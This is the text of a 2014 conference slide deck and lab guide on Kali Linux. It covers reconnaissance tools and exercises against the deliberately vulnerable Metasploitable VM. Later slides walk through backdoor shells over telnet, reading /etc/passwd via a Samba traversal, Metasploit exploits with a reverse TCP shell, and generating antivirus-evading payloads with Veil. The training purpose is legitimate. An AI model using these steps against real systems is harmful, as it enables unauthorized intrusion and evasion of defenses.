This is a presentation and how-to I gave at the Information Security Summit 2014.

1. What is Kali Linux?
Information Security Summit 2014
Westlake, Ohio

2. Welcome to ISS 2014

3. Tony Godfrey is the CEO / Linux Consultant
of Falconer Technologies (est 2003) specializing in
Linux. He has written several articles on the body
of knowledge of security administration, is a
regular contributor to a variety of Linux
publications, and has written technical content for
Linux education nation-wide at the college level.
He also teaches topics covering Linux,
Network Security, Cisco routers, Cybercrime and
Welcome
System Forensics.

4. Welcome
Side Note:
I put a lot of extra materials, websites, &
definitions in the ‘Notes’ section of this PPT.

5. Intro, Description, How used, Background
Extra Info, Kali in a Box, Raspberry PI
Tools, Overview, & Conclusion
Setting up the Environments
CLI 101 / Tools 101
Kali 101, 201, & 301
Overview of Presentation

6. Presentation on Kali Linux
Intro

7. Who or What is ‘Kali’?

8. Kali the mother goddess despite her
fearful appearance, protects the good
against the evil. Unlike the other Hindu
deities her form is pretty scary and
formidable, intended to scare away the
demons both literally and figuratively!
Who is Kali?
Anu Yadavalli

9. Hindu Kali

10. Kali Linux is a Debian-derived Linux
distribution designed for digital forensics
and penetration testing. It is maintained
and funded by Offensive Security Ltd. It
was developed by Mati Aharoni and Devon
Kearns of Offensive Security through the
rewrite of BackTrack, their previous
forensics Linux distribution.
What is Kali Linux?

11. Kali Linux is the ‘rebirth’ of BackTrack
Linux. This is a custom distribution
designed for security testing for all skill
levels from novice to expert. It is the
largest collection of wireless hacking,
server exploiting, web application
assessing, social-engineering tools available
in a single Linux distribution.
BackTrack?

12. “Seven years of developing BackTrack
Linux has taught us a significant amount
about what we, and the security
community, think a penetration testing
distribution should look like. We’ve taken all
of this knowledge and experience and
implemented it in our “next generation”
penetration testing distribution.”
Developers - March 12, 2013

13. “After a year of silent development,
we are incredibly proud to announce the
release and public availability of “Kali
Linux“, the most advanced, robust, and
stable penetration testing distribution to
date.
Kali is a more mature, secure, and
enterprise-ready version of BackTrack
Linux.”
Developers - March 12, 2013

14. Kali Linux’s developers would like
everyone to use Kali Linux. But, Kali is a
Linux distribution specifically geared
towards professional penetration testing
and security auditing and as such. It is NOT
a recommended distribution for those
unfamiliar with Linux.
Warning!

15. Kali likes its own dedicated hardware.
If you are learning about Kali and
penetration testing (Metaspolitable) then a
virtualized environment may be a
consideration. VMware Player 5 works well
and set the RAM to 1gb.
Hardware / Software

16. Kali recommends 10gb for the initial
install, 512MB RAM min, i386/AMD64,
CD/DVD / USB support.
Now…if ‘Veil’ is installed (+ 10gb) and
doing the updates/upgrades (+ 5gb), and
don’t forget the Alfa antenna.
Hardware / Software

17. http://www.kali.org/

20. Other guys?

21. BackBox is an Ubuntu-based
distribution developed to perform
penetration tests and security assessments.
It provides a minimal yet complete desktop
environment, thanks to its own software
repositories, which are always updated to
the latest stable versions of the most often
used and best-known ethical hacking tools.
Other guys? BackBox

22. Pentoo is a Live CD/USB designed for
penetration testing and security
assessment. Based on Gentoo, it is
provided both as 32/64 bit installable
livecd. It features packet injection patched
wifi drivers, GPGPU cracking software, and
lots of tools for penetration testing and
security assessment.
Other guys? Pentoo

23. BlackBuntu is distribution for
penetration testing which was specially
designed for security training students and
practitioners of information security.
Blackbuntu is penetration testing
distribution with GNOME Desktop
Environment. It's currently being built
using the Ubuntu 10.10.
Other guys? BlackBuntu

24. EnGarde Secure Linux was designed to
support features suitable for individuals,
students, security enthusiasts, and those
wishing to evaluate the level of security and
ease of management available in Guardian
Digital enterprise products.
Other guys? EnGarde

25. Other guys? A few more….

26. Presentation on Kali Linux
Categories & Websites

27. What’s in the box, Pandora?

28. Top 10 Security Tools
Information Gathering
Vulnerability Analysis
Web Applications / Password Attacks
Wireless Attacks / Exploitation Tools
Sniffing/Spoofing / Maintaining Access
Reverse Engineering
Stress Testing / Hardware Hacking
Forensics / Reporting Tools
System Services
There are several categories

29. Metapackages also exist

30. Kali Information
See ‘Notes’ section in this slide

31. Getting your pentesting lab ready
Hacking tutorial
20 things to do after installing Kali
Information
Cracking WEP
6 Resources & Tutorials on Kali

32. Kali & More PenTesting
See ‘Notes’ section in this slide

33. PenTest Tools
Penetration Testing Tools
PenTestMag
Chrome as a PenTest Tool
Firefox as a PenTest Tool
Kali & More PenTesting

34. Kali-specific Websites
See ‘Notes’ section in this slide

35. Kali4Hackers
Hacking with Kali Linux
YouTube
Kali Linux
Hack with Kali Linux
Kali-specific Websites

36. Kali Publications
See ‘Notes’ section in this slide

37. Kali Book
BackTrack to Kali
Basic Security Testing with Kali
Kali Linux Assuring Security
Kali Publications

38. Do you want to run Kali on tablet or phone?
http://www.kali.org/how-to/kali-linux-android-linux-deploy/
Kali in a box?

39. Kali in a box?
Basically….
1.Get a tablet
1. Install ‘Linux Deploy’
2. Install Samsung Kies on PC
3. Tablet - USB Debugging ON
4. Install SuperOneClick on PC
5. Wait 5 minutes…
6.Done

40. Do you want to run Kali on a Nexus?
http://www.kali.org/kali-linux-nethunter/
Kali + Nexus = NetHunter

41. Kali on a Nexus?

42. How to hack your own network and beef up
its security with Kali Linux
http://lifehacker.com/how-to-hack-your-own-network-and-beef-
up-its-security-w-1649785071
Kali & Lifehacker

43. Kali & Raspberry PI
See ‘Notes’ section in this slide

46. What is Metaspolitable?
See ‘Notes’ section in this slide

47. Metasploitable is an intentionally
vulnerable Linux virtual machine. This VM
can be used to conduct security training,
test security tools, and practice common
penetration testing techniques.
The default login and password is
msfadmin:msfadmin.
Metaspolitable?

48. Presentation on Kali Linux
DVD, Tools, Demo

49. /books
◦Official Kali Guide
◦eForensics
◦Other published materials
/media
◦7-Zip, kali_iso, metaspolitable doc,
SD_formatter, Unetbootin, USB_installer,
VMware, Win32_DiskImager
/PPT
What’s on the DVD?

50.  We’re going to type something
 We’re going to make a note
 Might be a question?
 We’re going to click on something
 Recon  Attack
Legend

51.  traceroute
Essentially, ‘tracert’ in Windows
 traceroute –i eth0 <Target IP>
It displays the route (path) and measuring transit delays of packets
across an Internet Protocol (IP) network
traceroute

52. 
nmap –p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a
computer network, thus creating a "map" of the network
nmap

53. 
nmap –sS –Pn –A <Target IP>
A security scanner used to discover hosts and services on a
computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan,
and ‘A’ is O/S detection, services, service pack.
nmap

54. 
rpcinfo –p <Target IP>
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
rpcinfo

55. On Kali…
tcpdump –I eth0 src <Target IP>
On Metaspolitable…
ping www.yahoo.com
open a Browser & go to CNN.com
tcpdump

56. On Kali
 nikto –h <Target IP>
Its an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.
nikto

57. From Kali
 whatweb <Target IP>
 whatweb –v <Target IP>
 whatweb –a 4 <Target IP>
WhatWeb recognizes web technologies including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.
whatweb

58. Let’s run Zenmap
 Applications  Kali Linux
 Information Gathering
 DNS Analysis
 Zenmap
Zenmap

59. Let’s run SHODAN
 Open a browser
 www.shodanhq.com
 type in ‘almost anything’
 …Be very nervous…
SHODAN

60. If you want something more basic…dmitry
 dmitry –s <domain.com>
 It gives you site names & IP’s
dmitry

61. Presentation on Kali Linux
Final Thoughts

63. Thank you for your time.
Falconer Technologies
TonyGodfrey@FalconerTechnologies.com
877 / TUX RULZ or 877 / 889-7859
Thank you

64. Use your powers for good

65. Thank You

66. The second part of this slide deck covers more
tools and hands-on.

67. Presentation on Kali Linux
Lab #1 & Prep

68. - Let’s make a folder called  kali_2014
- Copy the DVD contents into that folder
- Install 7-Zip
- Install VMware Player
Let’s make sure the virtual environments are working and can ‘ping’
each other
Getting Ready…

69. Press <CTRL><Alt> at the same time to
be released from the current virtual
environment. You can then do a normal
<Alt><Tab> to toggle between different
applications.
VMware Player

70. Kali Login  root
Kali Password  password
Metaspolitable Login  msfadmin
Metaspolitable Password  msfadmin
Download Metaspolitable from:
http://sourceforge.net/projects/metasploitable/
Logins / Passwords

71.  Login  msfadmin
 Password  msfadmin
 ifconfig
 Jot down the IP & Netmask
 route
 Jot down the Gateway
Metaspolitable V/E

72. Virtual Environment #1
◦Metaspolitable
 Go to TERMINAL
rlogin –l root <IP Address>
cd /tmp
ls -l ...vs... ls -la
rm .X0-lock
 startx
Metaspolitable V/E

73.  Login  root
 Password  password
 ifconfig
 Jot down the IP & Netmask
 route
 Jot down the Gateway
Kali V/E

74. Go to:
Applications  System Tools
 Preferences  System Settings
 Display  Resolution: ____
Then…[Apply]
Kali V/E

75. From the command line, type 
apt-get update && apt-get upgrade
Note: This has already been done to save time, but should be done
after a new installation.
Kali Updating

76. Presentation on Kali Linux
Lab #2 – Command Line Tools

77. Command Line Tools
Presentation on Kali Linux

78.  We’re going to type something
 We’re going to make a note
 Might be a question?
 We’re going to click on something
 Recon  Attack
Legend

79. ping
 ping
Packet InterNet Groper
Port = 8
Establishes physical connectivity between two entities
 (from Kali) ping <Target IP>
Did it echo back?

80. top
 top
Tells us what services are running,
processes, memory allocation
Basically, a live system monitor

81. df
 df
Tells us how much space is available
or ‘disk free’

82. du
 du
Tells us how much space is taken or
‘disk used’.
You can get a shorter report by…
 ‘du –s’ … (disk used –summary)

83. free
 free
How much ‘free’ memory is available

84. ls
 ls
This is for ‘list’
 ls –l (list –long)
 ls -la (list – long – all attributes)

85. pwd
 pwd
Directory structure
Means ‘path to working directory’ or
‘print working directory’

86.  ps
Means ‘Process Status’
◦aux – auxiliary view
◦pstree – shows parent/child relationships
◦Windows – tasklist / taskkill
Kill - Stops a process (ex: kill PID)
ps / ps aux / pstree

87. Presentation on Kali Linux
Lab #3 – CLI & Services

88. CLI & Services
Presentation on Kali Linux

89.  traceroute
Essentially, ‘tracert’ in Windows
 traceroute –i eth0 <Target IP>
It displays the route (path) and measuring transit delays of packets
across an Internet Protocol (IP) network
traceroute

90. 
nmap –p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a
computer network, thus creating a "map" of the network
nmap

91. 
nmap –sS –Pn –A <Target IP>
A security scanner used to discover hosts and services on a
computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan,
and ‘A’ is O/S detection, services, service pack.
nmap

92.  rlogin –l root <Target IP>
 whoami
 tcpdump -i eth0 host <Target IP>
A packet analyzer that runs under the command line. It allows the
user to intercept and display TCP/IP and other packets being
transmitted or received over a network to which the computer is
attached.
rlogin (from Metaspolitable)

93. 
rpcinfo –p <Target IP>
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
rpcinfo

94.  showmount –e <Target IP>
 showmount –a <Target IP>
It displays a list of all clients that have remotely mounted a file system from a
specified machine in the Host parameter. This information is maintained by
the [mountd] daemon on the Host parameter.
showmount

95.  telnet <Target IP> 21
After '220...'
 user backdoored:)
 <CTRL><]>
 quit
telnet
Port 20/21 is FTP

96.  telnet <Target IP> 6200
After 'Escape character...',
 id;
<CTRL><]>
 quit
Port 6200 - Oracle Notification Service remote port Oracle Application Server
telnet

97.  telnet <Target IP> 6667
IRC (Internet Relay Chat)
Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP,
Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan,
Vampire, Moses, Maniacrootkit, kaitex, EGO.
telnet

98.  telnet <Target IP> 1524
After 'root@meta....',
 id
Many attack scripts install a backdoor shell at this port (especially those
against Sun systems via holes in sendmail and RPC services like statd,
ttdbserver, and cmsd). Connections to port 600/pcserver also have this
problem. Note: ingreslock, Trinoo; talks UDP/TCP.
telnet

99. Presentation on Kali Linux
Lab #4 – Working w/Metaspolitable

100.  smbclient –L <//Target IP>
 msfconsole
...wait, wait, wait..., then
use auxiliary/admin/smb/samba_symlink_traversal
 set RHOST <Target IP>
 set SMBSHARE tmp
smbclient

101.  exploit
...Connecting to the server.....
...<yadda, yadda, yadda>...
...Auxiliary module....
At the prompt, type  exit
smbclient

102.  smbclient //<Target IP>/tmp
Do you get the 'smb: >' prompt?
 cd rootfs
 cd etc
 more passwd
Do you get a list of all user accts?
smbclient

103. On Kali…
tcpdump –I eth0 src <Target IP>
On Metaspolitable…
ping www.yahoo.com
open a Browser & go to CNN.com
tcpdump

104. On Kali
netdiscover –i eth0 –r <Target IP>/24
Netdiscover is an active/passive address reconnaissance tool, mainly
developed for those wireless networks without DHCP server, when you are
wardriving. It can be also used on hub/switched networks.
netdiscover

105. On Kali
 nikto –h <Target IP>
Its an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.
nikto

106. On Kali
sqlmap –u http://<Target IP> --dbs
It is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database
servers.
sqlmap

107. From Kali – open IceWeasel
 http://<Target IP>/
Research: Multillidae <p. 8>
The Mutillidae are a family of more than 3,000 species of wasps (despite the
names) whose wingless females resemble large, hairy ants. Their common
name ‘velvet ant’ refers to their dense pile of hair which most often is bright
scarlet or orange, but may also be black, white, silver, or gold.
Wasp Services

108. From Kali – open IceWeasel
 http://<Target IP>/
Research: Multillidae <p. 8>
Mutillidae is a free, open source web application provided to allow security
enthusiest to pen-test and hack a web application
Web Services

109. From Kali
 whatweb <Target IP>
 whatweb –v <Target IP>
 whatweb –a 4 <Target IP>
WhatWeb recognizes web technologies including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.
whatweb

110. Presentation on Kali Linux
Lab #5 - msfconsole

111. From Kali - msfconsole
Presentation on Kali Linux

112. From Kali
 service postgresql start
 service metasploit start
 msfconsole
Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole
We will then take a look at the built-in exploit tools
msfconsole

113. From [msf>] console
 help search
 show exploits
 search dns
‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in
exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
msfconsole

114. From [msf>] console
 search Microsoft
 search diablo
 search irc
 search http
Let’s try a few more to see what they do….
msfconsole

115. From [msf>] console, search for ‘unreal’
 info <exploit>
 use <exploit>
 show options
 LHOST, RHOST, LPORT, RPORT
msfconsole

116. From [msf>] console (ex: unreal)
 set RHOST <IP Address>
 show options
 exploit

msfconsole

117. From [msf>] console, search for ‘twiki’
 info <exploit>
 use <exploit>
 show options
 LHOST, RHOST, LPORT, RPORT
msfconsole

118. From [msf>] console (ex: ‘twiki’)
 set RHOST <IP Address>
 show options
 exploit

msfconsole

119. From [msf>] console, (target: Win XP)
 use exploit/windows/smb/ms08_067_netapi
 show options
 show targets
 set target 2
msfconsole

120. From [msf>] console, (target: Win XP)
 show options
 show advanced
 show targets
 show payloads
msfconsole

121. From [msf>] console, (target: Win XP)
 set payload windows/shell_reverse_tcp
 show options
 set LHOST <Kali IP Address>
 set RHOST <Target IP Address>
msfconsole

122. From [msf>] console, (target: Win XP)
 show options
 exploit
 Any errors?

msfconsole

123. Presentation on Kali Linux
Lab #6 – more GUI

124. From Kali – more GUI
Presentation on Kali Linux

125. Let’s run Zenmap
 Applications  Kali Linux
 Information Gathering
 DNS Analysis
 Zenmap
Zenmap

126. Let’s run SHODAN
 Open a browser
 www.shodanhq.com
 type in ‘almost anything’
 …Be very nervous…
SHODAN

127. Let’s run FERN
 Kali Linux
 Wireless Attacks
 Wireless Tools
 fern-wifi-cracker
FERN

128. Kali has many built-in tools, but you
can always install more (Debian-based).
But, you may always wish to add more
such as recon-ng.
recon-ng
automated info gathering and
network reconnaissance.
recon-ng

129. Let’s run recon-ng…
 cd /opt/recon-ng
 /usr/bin/python recon-ng
 show modules
 recon/hosts/gather/http/web/google_site
recon-ng

130. Let’s run recon-ng…
 set DOMAIN <domain.com>
 run (…let this run awhile…)
 back (…previous level…)
 show modules
recon-ng

131. Let’s run recon-ng…
 use reporting/csv
 run
 Will add your new information to
/usr/share/recon-ng/workspaces/default
recon-ng

132. If you want something more basic…dmitry
 dmitry –s <domain.com>
 It gives you site names & IP’s
dmitry

133. veil
Kali has many built-in tools, but you
can always install even more (Debian-based).
You may always wish to add more
such as veil.
veil
Remote shell payload generator
that can bypass many anti-virus
programs.

134. Let’s run veil
veil
 veil-evasion
 list (available payloads list)
 use 13 (powershell/VirtualAlloc)
 generate

135. Let’s run veil
veil
 1 (msfvenom)
 [ENTER] (accept default)
 Value for LHOST (Target IP)
 Value for LPORT (ex: 4000)

136. Let’s run veil
veil
 Output name (“Squatch”)
 It will store this new batch file to
the  /usr/share/veil/output/source
folder. When the file is run from the target
machine, it will attempt to do a reverse
shell session with Kali.

137. Presentation on Kali Linux
Final Thoughts

139. Thank you for your time.
Falconer Technologies
TonyGodfrey@FalconerTechnologies.com
877 / TUX RULZ or 877 / 889-7859
Thank you

140. Use your powers for good

141. Thank You